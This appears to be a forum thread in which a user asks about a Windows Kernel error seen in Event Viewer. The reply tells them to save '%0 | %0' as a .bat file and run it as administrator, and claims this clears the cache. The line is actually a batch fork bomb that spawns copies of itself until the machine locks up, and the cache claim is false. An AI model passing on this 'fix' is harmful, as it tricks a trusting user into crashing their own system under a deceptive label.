I look in the event viewer and find this:

Does anyone know what this Kernel error means and how to solve it?

Open notepad
(forgive me i wrote it the wrong way before because i am not used to windows)
Write:
%0 | %0
Then save as:
whatever.bat
(no .txt after it)
Then just run it as an administrator.
BTW what this command does is clear cache.
